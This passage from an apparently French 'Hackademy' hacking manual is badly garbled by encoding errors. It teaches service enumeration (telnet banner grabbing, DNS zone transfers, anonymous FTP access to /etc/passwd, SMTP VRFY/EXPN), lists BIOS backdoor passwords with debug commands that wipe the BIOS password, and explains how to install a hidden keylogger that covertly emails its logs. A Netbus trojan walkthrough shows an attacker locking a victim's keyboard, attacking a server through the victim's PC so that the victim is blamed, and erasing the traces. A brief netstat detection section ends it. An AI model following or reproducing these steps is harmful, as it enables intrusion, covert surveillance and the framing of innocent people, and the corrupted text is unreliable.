l'option M)ort listM, qui ne permet de #rifier que certains ports spcifiques.

E. 6'option Threads dfinit le nombre de requ%tes de scans de ports en#oyer en m%me temps. ;u lieu de scanner les ports un par un, #ous pou#e* multiplier ainsi #otre acti#it par plus de 5H fois U ndique* une #aleur de 5H FH dans MThreadsM, qui est fonction de #otre #itesse de connection. ,#ite* de mettre une #aleur trop grande, cel risquerait de faire bugguer l'application. &e m%me, n'ou#re* pas deu! fois -autilus -et9anger, utilise* une, et une seule, session d'application. $inon, l aussi, le logiciel risquerait de patauger. F. 6ance* le scan, en cliquant sur M@oM.

The Hackademy

DM

12F3441

S!SD"#AM

J. ;u ni#eau des rsultats ne #ous proccupe* pas de la couleur des pastilles. $eul les ports indiqus comme actifs .M;CT +,M0 nous intressent. 6a liste des ports indiqus comme actifs r#"le gnralement la prsence d'application ser#eurs acti#es dli#rant des ser#ices bien spcifiques. ;fin de rsoudre l'identit de ces ser#eurs et le ser#ice qu'ils dli#rent les pirates peu#ent mettre des hypoth"ses sur les ser#eurs. "elev0 de =anni<res & 8ne fois que le pirate a scann les ports il #a ensuite tenter de rcuprer le nom du ser#eur et sa #ersion associ au port sur lequel il coute. =n appelle cela le grab de banni"re. Chaque protocole permet .ou non0 de rcuprer sa banni"re d'un certaine faGon. 6a faGon la plus simple est de se connecter sur le port en coute en utilisant l'outil telnet. Telnet .Telecommunications -etCork0 permet une machine client de se connecter sur un ser#eur, et ce, quelles que soient leurs localisations dans le monde, pour peu que ces deu! machines sont raccordes l[ nternet. 6es clients telnet e!istent sur la quasi1totalit des plates1formes .RindoCs, 8ni!, (ac=$, <e=$\0. l permet la conne!ion TC) sur n[importe quel port d[un machine distante. l y a deu! faGons d[utiliser correctement Telnet ' ] ,n utilisant l[interface graphique ] ,n indiquant des options au programme au moment de le lancer )our la premi"re solution, ou#re* telnet ' 7. Clique* sur ^&marrer_, 2. )uis sur ^,!ecuter_. 5. Tape* ^telnet_ et #alide*. :. Clique* sur ^Conne!ion_, puis sur ^$yst"me distant_. E. &ans la fen%tre, indique* un nom d[h>te ou une adresse ) pour permettre la connection au syst"me distant. ,ntre* ensuite un numro de port. ;ttention U )our les ser#ices les plus courants
The Hackademy DM 12J3441 S!SD"#AM

.$(T), BT), HTT), etc.0 #ous pou#e* entrer comme indication non pas le numro de port mais le ser#ice qu[il dsigne. )ar e!emple, au lieu d[indiquer ^KH_, #ous pou#e* indiquer ^HTT)_. Cette pratique #ous est dconseille pour au moins les motifs qui sui#ants ' ] Cela ne marche pas pour tous les ser#ices N ] +ous pourre* %tre amen tra#ailler sur un autre syst"me oT cette fonctionnalit ne sera pas prsente N ] mplicitement, #ous n[apprendre* pas la dsignation numrique des diffrents ports N )our accder plus rapidement des connections distantes, prfre* la deu!i"me solution. 7. Clique* sur &marrer, 2. )uis clique* sur ,!cuter. 5. Tape* ^telnet Y )Z Y)=9TZ_, ce qui donne pour le site dmpfrance.com, par e!emple, ^telnet dmpfrance.com KH_, ce qui #ous connectera sur le ser#ice HTT) du site dmpfrance.com. D3S & Domain 3ame Server Tout domaine est associ un ser#eur &-$, hberg soit sur le rseau lui meme, soit en e!terne. 6e r>le de ce ser#ice est de ren#oyer un client l'adresse ) associe un nom d'hote. 6e transfert de *one permet de demander au ser#eur &-$ de lister toute les entres correspondantes un domaine en particulier. Cela est en gnral utilis par les ser#eurs de noms secondaires, afin de mettre jour leurs entres, sans que l'administrateur n'ai le faire manuellement. $i l'on ne miTite pas la consultation de ces entres au seul ser#eur secondaire, un pirate peut lister les entres d'un domaine. 6e rseau sera poura donc %tre mapp, sans que l'intrus n'est pinger indpendamment chaque machine. 6'outils nslookup present sur Rinnt32HHH3D) permet d'effectuer un transfert de *one sur un ser#eur &-$ '

FT & Files Transfert rotocol BT) est utile d"s qu[il s[agit de transfrer des donnes entre deu! machines ; et <. Comme pour tous les ser#ices, la machine ; doit %tre quipe d[un client ftp, alors que la machine < est, elle, quipe d[un ser#eur BT). 6e protocole TC) utilise par con#ention le port TC)327 pour les commandes, et le port TC)32H pour les donnes. 6e port TC)327 est appel l[interprteur de protocole .)rotocol nterpreter ou ) 0, alors que le port TC)32H est appel processus de transfert de donnes .data transfert process ou
The Hackademy DM 12K3441 S!SD"#AM

&T)0. Connecte*1#ous au ser#ice BT) #is, #ia le port 27. 9egarde* dj quelles informations #ous dli#re la banni"re, s[il y en a. 9echerche* #entuellement des informations sur le ser#eur mentionn. )uis tente* de #ous connecter en anonyme. )rfre* #otre na#igateur pour cette tIche. nternet ,!plorer #ous permet de #ous connecter directement un ser#ice BT), par dfaut en ;nonyme. -ote ' 8ne session ^;nonyme_ est une session gre par l[administrateur qui permet n[importe qui de profiter du ser#ice BT) du ser#eur .pour le tlchargement de fichiers sur le ser#eur, par e!emple0. (ais la configuration de certains ser#ices BT), qui laissent la possibilit d[acc"s des sessions anonymes, est parfois dsastreuse au point que certains sites laissent tra`ner l[acc"s au fichier ^passCd_ .d[arborescence ^3etc3passCd_, sous un syst"me linu!, ce fichier contient tous les logins actifs sur la machine0, ou encore l[arborescence compl"te du site, #oire m%me des rpertoires a#ec des acc"s criture .oT tout le monde peut en#oyer des fichiers gnralement0. &epuis nternet ,!plorer le ^broCsing_ .un affichage0 des rpertoires r#"le des rpertoires typiques de syst"mes de type 8- D. l s[agit de #rifier si c[est #ritablement le cas. =u#re* une session BT) #ia telnet et connecte*1#ous en ;nonyme.

@nralement, sous BT), les commandes ne #arient pas selon les ser#eurs. ;insi, pour #ous connecter il #ous faudra utiliser la synta!e sui#ante ' 7. 8$,9 ;nonymous Ypour rentrer en ;nonymeZ 2. );$$ machin/chose.com Ygnralement, #ous aure* indiquer #otre adresse e1mail comme mot de passeZ ,nsuite, #ous #ous retrou#ere* l[a#eugle, surtout si #ous ne connaisse* pas le syst"me. 6es commandes qu[il #ous est possible d[enregistrer sont gnralement listables par la commande ^help_ ou ^S_.

The Hackademy

DM

1243441

S!SD"#AM

$ur l[e!emple ci1dessous, les commandes du ser#ice BT) ont t utilises .sur un autre syst"me0 pour mettre en lumi"re le type de syst"me d[e!ploitation utilis. ci, les informations dli#res sont d[une importance mineure. Ceci dit, certains syst"mes #ont jusqu[ r#ler la #ersion du syst"me d[e!ploitation, ce qui est manifestement plus gra#e. SMT & Simple Mail Transfert rotocol 6e protocole $(T) est certainement un des protocoles le plus utilis sur l[ nternet. $on but est de permettre le transfert des courriers lectroniques. l est similaire au protocole BT), de part son langage de commande. l est gnralement implment sur le port TC)32E. Comme pour tous les autres ser#ices, un ser#ice $(T) peut r#ler, par sa banni"re, des informations. (ais le plus intressant, c[est l[intgration, non ncessaire, de deu! commandes spcifiques au ser#ice $(T). Ces deu! commandes sont ^#rfy_ et ^e!pn_. )our #rifier si elles sont accessibles, tape* ^help_. ] +rfy ' cette commande a pour but de #rifier si une adresse e1mail e!iste l[adresse du ser#eur questionn. Ce qui #eut dire que si #ous #ous connecte* un syst"me d[adresse ^betetruc.com_, que #ous tape* ^#rfy admin_, et que le syst"me #ous rpond positi#ement, c[est qu[il e!iste une adresse ^admin/betetruc.com_, et donc certainement un compte de login ^admin_ sur le syst"me. l est donc possible de rcuprer des logins sur le syst"me concern. ] ,!pn ' cette commande permet de #rifier l[e!istence d[alias au sein d[un syst"me pour un compte donn. 8n alias permet une personne physique d[a#oir plusieurs adresses e1mails. Cela peut %tre une bonne source d[informations. &ans l[e!emple ci1dessous, le pirate a russi a#oir des informations sur l[identit d[une personne, et sur les alias tournant pour ^root_ .certainement des adresses correspondant d[autres administrateurs syst"mes0.

The Hackademy

DM

15H3441

S!SD"#AM

HTT & Hyper Te1t Transfert rotocol )our #ous connecter un syst"me #ia HTT), utilise* le port KH. ;pr"s quoi, il #ous est possible d[en#oyer diffrentes commandes au syst"me, celles1ci pou#ant a#oir des consquences diffrentes. 6e procd consiste en#oyer d[abord une commande #alide, puis rappuyer sur ,-T,9 afin de ren#oyer une #alidation. )renons un e!emple concret ' 7. Connecte*1#ous sur CCC.microsoft.com .telnet CCC.microsoft.com KH0 2. ,ntre* comme commande ' =)T =-$ 3 HTT)37.H 5. +alide* en appuyant sur ,-T,9, et re#alide* nou#eau. :. 6es informations contenues dans )5) .^)latform for )ri#acy )references_0 dsignent les informations collectes sur les utilisateurs. 9fre*1#ous http'33CCC.C5.org3T93)5)3 pour en sa#oir plus sur le syst"me )5).

l est aussi possible d[utiliser la commande @,T et =)T =-$ sur un m%me ser#eur, ceci permettant de r#ler un certain nombre d[informations intressantes de faGon complmentaire. -ote concernant HTT) ' autant un ser#eur HTT) tel que $ est soumis de nombreuses failles, autant sur ;pache, le nombre de failles est quasi1ine!istant. ;pache est une application ser#eur pour diffrents syst"mes d[e!ploitations, y compris RindoCs. l est enti"rement gratuit et a forte tendance concurrencer le ser#eur $ en raison de sa qualit et de sa fiabilit. l s[octroie d[ailleurs une plus grande part de march que ce dernier. (ais ne #ous fie* pas ce mod"le de scurit ' des erreurs de configuration inhrentes la distraction de l[administrateur peu#ent a#oir de lourdes consquences. ;pache.org en a fait les frais en 44.

The Hackademy

DM

1573441

S!SD"#AM

S3M & Simple 3etCork Mana4ement rotocol $-() est un protocole de gestion d[quipement rseau qui permet l[administrateur d[interroger ses quipements afin d[en rcuprer des informations. &ans notre e!emple, nous a#ons trou# quatre quipements sur notre rseau qui figuraient dans le community string ^public_, c[est11dire que n[importe qui peut a#oir acc"s au! informations que les quipements ren#oient.

+ous pou#e* trou#er sur http'33CCC.solarCinds.net3

internet

des

outils

qui

permettent

d[automatiser

les

requ%tes.

-ote ' le community string ^public_ est, gnralement, la #aleur par dfaut attribue une machine faisant tourner un agent $-(). C[est l[administrateur d[en modifier la configuration. 6e contraire d[un string public est le string ^pri#ate_, qui, lui, n[autorise ne dli#rer aucune information au grand public. T#/3#T & Telecommunation 3etCork )as de miracle pour Telnet. Ce ser#ice est gnralement restreint par une identification obligatoire par login et mot de passe. 6a banni"re qu[affiche le syst"me peut en re#anche %tre utile. 8tilise* telnet pour #ous connecter. )ar dfaut, #ous #ous connecte* sur le port 25, donc, il n[est pas ncessaire de spcifier de port.

&ans notre e!emple, la #ersion compl"te du syst"me d[e!ploitation est d#oile. (ais, et c[est tout aussi gra#e, la #ersion du noyau .?ernel 2.2.7J0 l[est aussi. ;#ec de telles informations, ce type de syst"me risque de ne pas tenir deu! secondes face un pirate de ni#eau moyen.

The Hackademy

DM

1523441

S!SD"#AM

CHA IT"# III Atta>ues de services

I 9 "echerche de failles
The Hackademy DM 1553441 S!SD"#AM

$i le pirate rcupr un nom de ser#eur et sa #ersion, il #a ensuite essayer de rechercher une #ulnrabilit lui permettant soit de rcuprer d'autres informations, soit de faire planter le ser#ice ou au mieu! de faire e!ecuter du code au ser#eur. Ces failles font parties des failles applicati#es. l e!iste sur nternet des sites publiant les di#erses failles trou#es par la communaute Rhite Hat lors d'audit de code. Certaines failles seront accompagnes de ce que l'on appel O e!ploit P, d'autres non. 8ne faille designe une erreure dans un morceau de code d'une application. 8n e!ploit est un morceau de code permettant d'e!ploiter cette faille, la plus part du temps pour faire e!ecuter une commande de notre choi!. &onc une faille publie n'est pas forcement accompagnes de l'e!ploit, car une personne peut tr"s bien etre capable de rechercher des failles mais incapable de coder un e!ploit et in#ersement ou tout simplement qu'une faille ne necessite pas d'e!ploit pour etre e!ploit mais juste d'une url en#oy par un na#igateur par e!emple. )our illustrer cette e!plication nous allons prendre comme e!emple le ser#eur ;pache #ersion 2.H et nous allons effectuer une recherche sur CCC.securityfocus.com qui est le plus gros site modial de publication de failles. ae #ous conseil d'ailleurs de #ous incrire la mailing liste <8@T9;A qui #ous a#ertira par mail des derni"res #ulnrabilits trou#es par la communaute Rhite Hat. +oici par e!emple une des #ulnrabilts trou# sur ;pache #ersion 2.H ' http'33CCC.securityfocus.com3bid3E:5: Chaque #ulnrabilit est associe un &, ici E:5: et est dcompos en plusieurs parties '

6a partie O info P #ous indiquera entre autres si la faille est e!ploitable distance ou en local, la date de publication de la faille, les diffrents syst"mes #ulnrables, etc... 6a partie O discussion P e!pliquant la faille en dtail.
The Hackademy DM 15:3441 S!SD"#AM

6a partie O e!ploit P contient l'e!ploit s'il a t d#elopp et si un e!ploit est ncessaire pour e!ploiter la faille. Comme #ous pou#e* le #oir dans notre e!emple, un e!ploit n'est pas ncessaire, il suffit de mettre une 896 prcise dans un na#igateur. 6a partie O discussion P contient un patch ou la mthode appliquer pour boucher la faille si une solution t trou#e. 6a partie O credit P contient l'email, site, contact de la personne ayant dcou#ert la faille. 6a partie O help P contient une aide propos des termes utiliss par bugtraq pour classifier les failles. &ans le cas ou aucune faille n'a t publie sur le Ceb, le pirate tentera d'auditer lui m%me le code du ser#eur la recherche d'une nou#elle faille.

The Hackademy

DM

15E3441

S!SD"#AM

CHA IT"# I7 Atta>ue physi>ue

The Hackademy

DM

15F3441

S!SD"#AM

I 9 /e Bios
Comme #ous de#e* le sa#oir, le < =$ .<asic nput =utput $ystem0 se trou#e sur #otre carte m"re.

C'est le circuit intgr rectangulaire .,,)9=(0 qui se trou#e sous la pile plate. 6a plus part du temps il y a un autocollant rflchissant dessus a#ec la rfrences du composant.

6e < =$ contient toute la configuration matrielle permettant de dmarrer #otre ordinateur correctement .e!' dtection disque dur, de la 9;(, des di#ers lecteurs, etc...0. $ur certains < =$, il est possible d'affecter un mot de passe pour protger l'acc"s a #otre syst"me d'e!ploitation .8ser )assCord0 ou la configuration du < =$ .$uper#isor )assCord0. $ur le plupart des ordinateurs il faut appuyer sur le bouton MB7M, MB2M, M$upprM, ou MCT96b;6Tb$M de #otre cla#ier lors du dmarrage de #otre )C pour accder a la configuration du < =$ .$etup <ios0. l e!iste plusieurs mthodes pour cracker un mot de passe < =$. (ais a#ant tout le pirate #a essayer de le de#iner en utilisant des mots de passe communs comme 725:, HHHH, passCord, pass, se!, argent, les pass par dfaut de di#ers syst"mes ou m%me des fois rien. %? remiere m0thode? ,lle consiste a utiliser les mots de passe du constructeur, ces pass sont en faite des backdoor mais tous les < =$ n'en on pas. )ass ;Card < =$' ;R;9& $R, ;R;9&X$R, ;Card $R, ;R;9& )R, XaCard, aCkCard, aF:, j2EF, j2F2, j552, j522, H7522222, EK4EK4, EK4J27, E4EE4E, E4KE4K, $,9, $?cXB=D, a66y, a66c, Condo, C=-C;T, TT)TH;, a);f, H6T, ?&&, d<;;;C;, d;;;&;, da;;;&C, djonet )ass ;( < =$' ;( , ;.(. ., ;( $R, ;( X$R, < =$, );$$R=9&, H,R TT 9;-&, =der )ass pour les autres < =$' 6?R),T,9, lkCpeter, < =$T;9, biostar, < =$$T;9, biosstar, ;6B;9=(,, $y!*, Rodj

The Hackademy

DM

15J3441

S!SD"#AM

'?Deu1i<me m0thode? $i #ous a#e* acc"s au syst"me d'e!ploitation mais #ous n'a#e* pas acc"s au $etup <ios... ,n utilisant une disquette de dmarrage .ou en redmarrant Cin4! en mode ms1dos0 pour accder au &=$ en mode rel, on #a pou#oir utiliser la command debug pour enle#er le pass d'acc"s a la configuration du < =$ .$etup0. 1 ;ppelle le programme Mc'e&=$edebugM ou Mc'eRindoCsecommandedebugM. ,n 2 mots, ce prog a#ec le param"tre 1= .=utput0 permet de transmettre directement un octet un port de sortie dont l'adresse suit et A permet de quitter le programme. nutile de prciser qu'il est asse* dangereu! utiliser. )our les < =$ ;( 3;R;9& ' McheminM3debug 1= JH 7J 1= J7 7J 1A )our les < =$ )honi! ' McheminM3debug 1= JH BB 1= J7 7J 1A @nric ' McheminM3debug 1= JH 2, 1= J7 BB 1A l ne #ous reste plus qu'a reboot #otre ordinateur... l e!iste aussi di#ers petits softs qui permettent de #oir et enle#er #otre pass < =$.pass d'acc"s a la configuration du bios0 a partir du &=$. +oici bios52H.e!e qui est disponible en tlchargement sur http'33CCC.77a.nu et qui permet de cracker la plupart des < =$ e!istant '

The Hackademy

DM

15K3441

S!SD"#AM

(?Troisi<me m0thode? ,nle#e* la pile plate qui se trou#e sur #otre carte m"re .en effet cette pile permet de sau#egarder certains param"tres du <ics comme l'heure et le mot de pass0. l faut attendre, en#iron 7E 5H minutes mais des fois une journe enti"re sera e!ig pour que la mmoire se #ide.

Ci1contre la pile plate en question....

6orsque l'on remettra la pile en place, tous les param"tre par dfauts seront restaurs, donc plus de mot de pass <ios. ;ttention ' @nralement, la pile est scell. &onc si #ous enle#e* la pile, #otre garantie sera perdue. )?>uatri<me m0thode? $ur certaines carte m"re il est possible de reset le pass < =$ en changeant de position d'un ca#alier .en gnral le ca#alier en question se trou#e cot du C < =$0. 9fre* #ous au manuel de #otre carte m"re pour plus d'informations. &"s que #ous a#e* trou# le ca#alier il suffit de changer sa position et d'attendre quelques secondes. ,nsuite, remette* le ca#alier sa position initiale et relance* #otre machine.

The Hackademy

DM

1543441

S!SD"#AM

*?Cin>uieme m0thode? ,lle consiste a court circuit 2 pattes du C <ios a l'aide d'un strap. )our cela il faut a#oir la doc constructeur du C qui nous permettra de sa#oir quoi correspond chaque patte. l faut faire tr"s attention car un mau#ais court circuit peut endommager #otre C et le remplacement sera in#itable. +?Si1i<me m0thode? $i aucune de ces mthodes ne fonctionne, il faut reprogrammer le < =$. )our cela il faut dmonter le < =$, a#oir un programmateur d' ,,)9=( .on peut trou#er cela dans tous les magasins d'lectronique0 et surtout l'image de #otre < =$ .fichier binaire contenant le < =$0. )our trou#er l'image de #otre < =$ il faudra faire un tour sur le site du fabriquant. Blasher un < =$ consiste a le reprogrammer. l faut faire tr"s attention a#ec le Blashing < =$ car il peut endommager #otre ,,)9=( ou #otre carte m"re. 6a connaissance des bases d'lectronique est conseill. =n peut aussi flasher le bios partir d'une disquette de dmarrage mais dans ce cas #ous de#e* a#oir acc"s au lecteur de disquette et utiliser un petit soft comme aflash .sans oublier l'image du nou#eau bios0.

The Hackademy

DM

1:H3441

S!SD"#AM

CHA IT"# 7 Controle D distance E espionna4e

The Hackademy

DM

1:73441

S!SD"#AM

I 9 #spionna4e de syst<mes
7 1 ?eylogging
6e ?eylogger .traduction littrale ' Menregistreur de clefsM0 est un dispositif en apparence simple, dont le concept est de se placer, un ni#eau logiciel, entre l'utilisateur et le traitement des donnes qu'il effectue par le cla#ier. ,n clair cela #eut dire que tout traitement, toute frappe, fait au cla#ier sera enregistr par le logiciel et stock sous forme d'un fichier consultable par la suite. ;insi le ?eylogger s'a#"re %tre un syst"me de sur#eillance fiable qui permet d'enregistrer de nombreuses choses comme des saisies de mots de passes, des saisies d'adresses, de rdactions de te!tes, etc. )ratiquer le ?eylogging n'est pas une chose illgale en soi condition qu'il soit effectu sur #otre machine, ou, si Ga n'est pas le cas, que la personne qui est sur#eille ne le soit pas son insu. 6a plupart des ?eyloggers sont in#isibles. C'est dire qu'ils fonctionnent en arri"re plan de toutes les applications RindoCs, de faGon cache, et qu'un utilisateur non a#erti ne s'aperce#ra nullement de la prsence d'un tel outil d'espionnage. l e!iste foule d'applications de ce type, plus ou moins performantes, et dont le pri! #arie du Mtout gratuitM au Mtout payantM en passant par les #ersions d'#aluations et les shareCares. -ous ne saurions trop #ous recommender de tester en premier lieu les #ersions gratuites afin de trou#er chaussure #otre pied. Baites par e!emple un petit tour sur CCC.doCnload.com en tapant comme mot clef pour #otre recherche MkeyloggersM. ;#ant de #ous en prsenter quelques uns, sache* qu'un bon keylogger, qui est parfaitement in#isible, ne doit '

manifester sa prsence aucun moment que ce soit N %tre #isible ni depuis la barre des tIches ni depuis le gestionnaire d'applications .CT96b;6Tb&,60.

)our illustrer le propos, prenons un tr"s bon e!emple ' i$pus STA"" C. a 2 Installation 6'installation ne de#rait poser aucun probl"me, m%me au moins initi. $ur la fen%tre de slection de la *one d'enregistrement des Mfichiers de logM .comprene* les fichiers oT sont stockes les informations qu'a enregistr le logiciel0, #ous a#e* trois possibilits '

@arder les logs sur l'ordinateur oT est install le logiciel .par dfaut, nous l'a#ons install a#ec cette option0. $i l'installation se fait a#ec cette option cel #eut dire que #ous %tes obligs d'a#oir un acc"s la machine oT $T;99 est install. &'enregistrer les fichiers de log sur un autre ordinateur du rseau local, sur un rpertoire en partage. &'en#oyer, par e1mail .et discr"tement, cel s'entend0 les fichiers de log.

; la fin de l'installation, le logiciel s'ou#re #ous prsentant sa fen%tre de gestion. )armi les diffrents onglets disposition seuls M&ashboardM et M(onitoringM sont susceptibles de nous intresser. 6e logiciel est enti"rement en anglais mais n'en reste pas moins tr"s facile d'utilisation.

The Hackademy

DM

1:23441

S!SD"#AM

= 2 5tilisation

6e lancement d'une session de capture d'informations s'effectue par la touche M$tartM. +ous pou#e* spcifier l'endroit oT #ous dsire* placer le fichier de log, et aussi le format sous lequel #ous dsire* l'enregistrer, le format par dfaut tant HT(6. -ous #ous conseillons de garder un format des fichiers de
The Hackademy DM 1:53441 S!SD"#AM

log en HT(6, cette option permettant une lecture pratique et esthtique de l'acti#it enregistre de l'ordinateur.

)ar l'onglet M(onitoringM #ous pou#e* spcifier sur quelles applications et quels processus #ous souhaite* porter #otre sur#eillance. &e m%me, en haut de l'cran, #ous pou#e* moduler la configuration concernant les captures d'cran .MscreenshotM0 #otre guise. 7. 6ance* une sance de capture .touche lecture3M$tartM0, et ferme* $T;99. 8ne fen%tre s'ou#rira #ous rappelant comment rou#rir $T;99 au besoin. Celle1ci indique qu'il #ous faut passer par M&marrerM M,!cuterM puis taper starrcmd.

The Hackademy

DM

1::3441

S!SD"#AM

2. )our tester le logiciel, mene* #os acti#its comme #ous le faites courrament, et au bout d'une di*aine de minutes par e!emple relance* $T;99. 5. )our afficher le rsultat de l'enregistrement des donnes, clique* d'abord sur le bouton MCreat 9eport from $T;99 logM. Cette tape est obligatoire, sinon le logiciel ne crera pas le fichier log.

:. ,nsuite clique* sur +ieC 9eport, ce qui #ous ou#rira l'diteur de te!te ou de page appropri selon l'option d'enregistrement que #ous a#e* choisi. $i #ous a#e* gard l'option d'un fichier log au format HT(6 alors ce sera #otre na#igateur Ceb qui s'ou#rira.

6a magie de l'espionnage a fait son chemin, #ous #oici maintenant en possession d'un fichier de log complet, structur et dtaill de toute l'acti#it de #otre )C.

II2

rise de contr@le D distance


DM 1:E3441 S!SD"#AM

The Hackademy

6e meilleur syst"me d'espionnage distance qui ait jamais t conGu reste le trojan. 8n trojan est une application de type dit Mche#al de troieM. Car, tout comme le che#al de Troie, il s'installe discr"tement sur une machine l'insu de l'utilisateur. a 2 Comment marche un troFan G 6'immense majorit des trojans se dissimulent dans des applications !cutables au format M.e!eM. Ces fichiers n'ont l'air de rien lorsqu'ils s'!cutent ' des petits jeu!, des animations, des fau! messages d'erreurs... (ais ils installent en arri"re plan, sur la machine qui a !cut le logiciel, une application ser#eur in#isible. M n#isibleM car l'utilisateur n'a jamais eut connaissance ni de son installation ni de son fonctionnement. Ce ser#eur #a ou#rir un port, et attendre passi#ement des demandes de connections de la part d'un client adapt. 6e pirate, lui, dispose de l'application client, qui est la seule pou#oir communiquer a#ec le ser#eur. 8ne fois connect il #a pou#oir interragir a#ec la machine de la #ictime ce qui #a lui permettre de faire tout ce que le trojan lui permet. ;insi deu! trojans diffrents ne permettront pas forcment un pirate de faire les m%mes choses. ;u fur et mesure que les annes se sont coules, les troyens .MtrojanM au pluriel0 ont fini par se comple!ifier, se di#ersifier, en#ahir d'autres syst"mes d'e!ploitation... 6e plus complet et l'un des plus cl"bre de nos jours reste certainement <ack =rifice 2HHH, mais le plus illustratif et dmonstratif, de par sa simplicit d'utilisation, est -etbus. = 2 #1p0rimentation ;fin de bien #ous mettre en conditions, nous allons e!primenter, tester, et ainsi #oir quelle peut1%tre l'utilit d'un trojan. &ans cet e!ercice nous allons prendre deu! machines. 6'une d'elle reprsentera la #ictime, l'autre le pirate. 6e but de l'e!ercice est d'arri#er prendre un contr>le total et utile de la machine pirate. -ous utiliserons -etbus 7.J, car, bien que ce ne soit pas la derni"re #ersion, elle est largement suffisante pour nos dmonstrations. -ous a#ons pris pour faire les essais deu! machines dans un rseau local. 6'une est infecte, l'autre sert simuler la machine du pirate. Interface

6'interface graphique de -etbus ne se compose que de boutons .grand bien en fasse au! $cript1 ?iddies0. )ar dfaut l'adresse ) entre dans MHost name3 )M est la #>tre. ,t le port indiqu est M725:EM,
The Hackademy DM 1:F3441 S!SD"#AM

qui est en fait le port qu'utilise le ser#eur de -etbus par dfaut. )as de danger lorsque #ous !cute* le client ' il n'est pas infect, quoiqu'en dise #otre anti1#irus. Connection 7. 8tilise* la *one MHost name3 )M et indique*1y l'adresse ) .ou le nom d'h>te0 de la machine infecte

2. Clique* sur MConnectUM 5. 8ne fois connect, le logiciel de#rait #ous le signaler

#spionna4e 7. 6a premi"re fonction d'espionnage que #ous pourre* e!ploiter sous -etbus est certainement M$creendumpM, qui sert faire des photos d'crans de la #ictime et #ous les en#oyer directement.

2. ,nsuite #ous pourre* toujours #isualiser les processus actifs de la #ictime, comme si #ous utilisie* son gestionnaires d'applications, grIce la commande M;cti#e CndsM .M;cti#e CindoCsM, en franGais ' MBen%tres acti#esM0

Ce qui #ous offre, par l'intermdiaire d'une fen%tre interne, un listing des applications ou#ertes. l est ncessaire de rafraichir rguli"rement cette liste afin de maintenir une sur#eillance continue sur une cible.

5. 6e gestionnaire de fichiers distance est aussi tr"s pratique et m%me effroyable. 6ance* le par l'intermdiaire de la touche MBile managerM

The Hackademy

DM

1:J3441

S!SD"#AM

Clique* ensuite sur M$hoC filesM, ce qui aura pour fonction de tlcharger toute l'arborescence du disque dur de la #ictime. l de#ient dsormais possible d'en#oyer, d'effacer, de tlcharger n'importe quel fichier sur le disque dur de la #ictime son insu.

:. 6es fonctions de ?eylogging #ues pralablement sont toujours acti#es ' en effet -etbus int"gre un gestionnaire de cla#ier tr"s performant puisque, non seulement #ous pou#e* lire en direct ce qu'crit la #ictime, mais #ous pou#e* aussi crire sa place U Ceci grIce la fonction M6istenM

8ne fois dans le gestionnaire de frappe de -etbus, sache* que toutes les touches .=ui, toutes U (%me ;6T, T;< ou ,-T9,,0 sont prises en compte.

;pr"s quoi #ous a#e* la possibilit d'enregistrer ce qui a t frapp par la touche M$a#e te!tM. D0monstration d6une prise de contr@le 6'utilisation de trojans est quelque chose que beaucoup de pirates ont en horreur ' c'est trop simple, ce
The Hackademy DM 1:K3441 S!SD"#AM

sont des logiciels qui ne s'adressent quasiment qu' l'attaque d'internautes, et non pas de #ritables ser#eurs d'entreprise... <ref, la rputation du trojan au sein de l'underground laisse fort dsirer. Cependant un bon pirate peut faire une utilisation intelligente et calcule d'un trojan. )lut>t que de b%tement redmarrer l'ordinateur de la #ictime, on #a essayer d'en prendre le contr>le afin de perptuer nos attaques sous le cou#ert de l'anonymat le plus total. MTotalM, pourquoi S )etit $cnario 7. 6e pirate Clad dsire attaquer le ser#eur D. 2. l sait que s'il l'attaque de front ce ser#eur, son adresse ) risque d'%tre repre au ni#eau des syst"mes de scurit du ser#eur D .fireCalls, &$, syst"mes de logs...0 5. l #a donc utiliser un syst"me par lequel il fera transiter ses demandes de connections, comme un routeur. :. $auf que, si il y a une enqu%te approfondie sur l'attaque, Clad sait qu'ayant laiss son adresse ) sur le routeur il prend des risques. E. l #a donc utiliser l'ordinateur d'un malheureu! particulier pour se connecter sur le routeur et ensuite attaquer le ser#eur D. F. l prendra ensuite soin d'effacer toute trace de ses manipulations che* la #ictime. $i l'opration se passe bien, il y aura une prise de risque quasi nulle, et, au pire, ce sera sa #ictime qui se fera inculper. )ratique

,n premier temps Clad se connecte la #ictime, et ce une fois fait, il lance une application telnet, afin de se connecter au routeur, par le biais du bouton M$tart )rogramM. Ce qui est brouill sur l'image reprsente l'adresse ) que nous a#ons tenue au secret.

l s'assure ensuite que la communication a bien t tablie et ceci par le gestionnaire d'applications distant ou la fonction M$creendumpM CheH le pirate CheH la victime

,nsuite Clad bloque le cla#ier de l'utilisateur, de sorte que celui1ci ne puisse inter#enir dans les manipulations futures qu'il #a effectuer, grIce au! touches M?ey managerM
DM 1:43441 S!SD"#AM

The Hackademy

puis M&isable all ?eysM

l s'agit maintenant d'entamer la procdure d'authentification au ni#eau du routeur en entrant un bon mot de passe. 6a procdure est simple ' il suffit au pirate d'utiliser le gestionnaire de touches de -etbus, par la fonction M6istenM CheH la victime

CheH le pirate

6'authentification depuis la machine de la #ictime a russie. (aintenant, si l'adresse ) est enregistre sur le syst"me pirat, ce sera celle de la #ictime infecte par -etbus, et non celle de Clad, qui sera retenue. Clad utilise maintenant le syst"me pour se connecter au ser#eur D.

#ffacer les traces (aintenant que le pirate a russit son coup, il doit effacer toutes traces de ses acti#its. ,n premier temps il #a fermer toutes les applications qu'il a lanc distance, grIce au gestionnaire d'applications et la fonction M?ill CndsM. ,nsuite il #a restaurer le contr>le du cla#ier grIce M?ey managerM et M9estore all keysM. ,nfin il #a supprimer le trojan de la machine, afin que la #ictime ne s'aperGoi#e jamais de son infection, grIce M$er#er adminM et M9emo#e ser#erM. 6a #ictime ne pourra jamais prou#er sa bonne foi dans le cadre d'une enqu%te judiciaire.

The Hackademy

DM

1EH3441

S!SD"#AM

CHA IT"# 7I Detection TroFans et Ieylo44ers

I 9 D0tection d6activit0 anormale


The Hackademy DM 1E73441 S!SD"#AM

8n trojan est une application cache, donc il n'chappe pas la r"gle du MRinBorceM, comme e!pliqu dans la partie ?ey6ogging. &e plus de nombreu! sympt>mes trahissent les trojans ' seuls les intrus modrs sauront #ous pirater sans #ous alerter. $inon des outils de sur#eillance des communications rseau! peu#ent se r#ler bien utiles. Bourni a#ec RindoCs, et fonctionnant sous &=$, 3etstat .-etCork $tatus0 #ous affiche quelles communications sont tablies, a#ec qui, et par quels ports. )our cela il suffit d'aller en mode ($1&=$ et de taper netstat. 6a commande netstat / #ous permettra de #oir comment utiliser des fonctions supplmentaires.

